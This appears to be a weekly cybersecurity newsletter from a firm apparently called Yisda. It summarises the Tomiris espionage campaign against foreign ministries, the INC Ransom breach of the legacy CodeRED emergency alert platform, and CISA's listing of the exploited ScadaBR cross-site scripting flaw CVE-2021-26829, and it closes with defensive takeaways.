Aging Infrastructure Meets Modern Threats: Government & Public Safety Networks Breached

Governments and Critical Services Face Renewed Cyber Pressure

This week’s newsletter highlights a rise in cyber activity targeting government, public-safety, and industrial systems. Diplomatic and foreign ministry networks across Russia and Central Assia faced renewed pressure from the Tomiris threat group. In the United States a breach of the legacy CodeRED emergency notification platform forced jurisdictions to take the system offline after stolen data surfaced online. Meanwhile, the Cybersecurity and Infrastructure Security Agency (CISA) added a long-standing OpenPLC ScadaBR vulnerability to its Known Exploited Vulnerabilities catalog after confirming active exploitation in industrial environments. Together, these developments highlight the increasing risks posed by evolving threat actors, third-party breaches, and aging operational technology.

Tomiris Intensifies Operations Against Diplomatic and Government Entities

A threat actor known as Tomiris has launched new operations against foreign ministries and government targets around the world, with recent activity concentrated in Russia and several Central Asian nations. These campaigns typically begin with spear phishing emails that deliver password-protected archives containing malicious executables, which then deploy malicious software written in languages such as Rust, Go, C++, and Python. Once inside a network, Tomiris tools perform focused reconnaissance and search for potentially sensitive documents, with some components compiling lists of file paths instead of immediately exfiltrating data, all while using public services like Telegram and Discord for command-and-control. The group also leverages open-source post-exploitation frameworks such as Havoc and AdaptixC2, which they use after initial compromise to expand their control over infected systems. This combination of custom malware, tooling, and command-and-control traffic hidden inside popular chat applications makes the activity harder to detect. Experts advise government and diplomatic networks to treat password-protected attachments with caution and monitor sensitive systems for unusual use of these services. Access the full article here.

Access the full article here.

Emergency Notification Service Taken Offline After CodeRED Breach

A threat actor known as the INC Ransom gang claimed responsibility for an intrusion on an emergency notification platform, reportedly stating that it breached the system earlier in November and encrypted files on November 10, although the company has not confirmed those dates and no ransom was paid. The data breach affected OnSolve’s legacy CodeRED emergency notification platform, leading public safety agencies across the country to take the system offline after data tied to the service was published online by a cybercriminal group. The company said the attack damaged systems within the legacy CodeRED environment, and officials have warned that user information such as names, addresses, emails, phone numbers, and passwords may have been exposed, prompting jurisdictions in several states to warn residents and urge password changes where credentials were reused. OnSolve decommissioned the legacy platform and is accelerating migration to its newer CodeRED by Crisis24 platform. The incident highlights third-party and supply-chain weaknesses, and how compromises at critical service providers can have broad impacts across emergency management and public safety operations.

Access the full article here.

CISA Highlights Active Exploitation of OpenPLC ScadaBR Vulnerability in Industrial Systems

The Cybersecurity and Infrastructure Security Agency (CISA) has added a long known OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities catalog after confirming that attackers are actively abusing it. Identified as CVE-2021-26829, the bug is a cross-site scripting issue in the system_settings.shtm component that lets an attacker inject into the SCADA interface and potentially take over sessions or change configuration settings. Although the issue was disclosed several years ago, the agency's update points to renewed exploitation against industrial control environments. Under Binding Operational Directive 22-01, federal agencies must address the vulnerability by December 19, 2025. CISA also notes that the weakness may appear in products that embed ScadaBR components and urges organizations to patch where possible, audit third-party use of the software, or retire affected systems if they cannot be secured.

Access the full article here.

Yisda Takeaways

The topics of this week’s newsletter show how threat actors are expanding both their techniques and their target scope across critical sectors. Tomiris’s use of password-protected phishing, varied custom tooling, and command-and-control traffic hidden within common chat platforms illustrates how modern espionage operations are becoming increasingly difficult to detect. The breach of OnSolve’s legacy CodeRED platform underscores how a single vendor compromise can disrupt emergency notification capabilities across multiple jurisdictions. Meanwhile, CISA’s warning about active exploitation of an older OpenPLC ScadaBR vulnerability highlights how unpatched and inherited components continue to expose industrial networks to real-world risk. Together, these incidents reinforce the need to secure third-party integrations, strengthen defenses against email-borne threats, maintain visibility across operational environments, and prioritize remediation of known vulnerabilities, while applying zero-trust principles to remote access pathways where they are most critical and continuing to reduce the organization’s overall attack surface.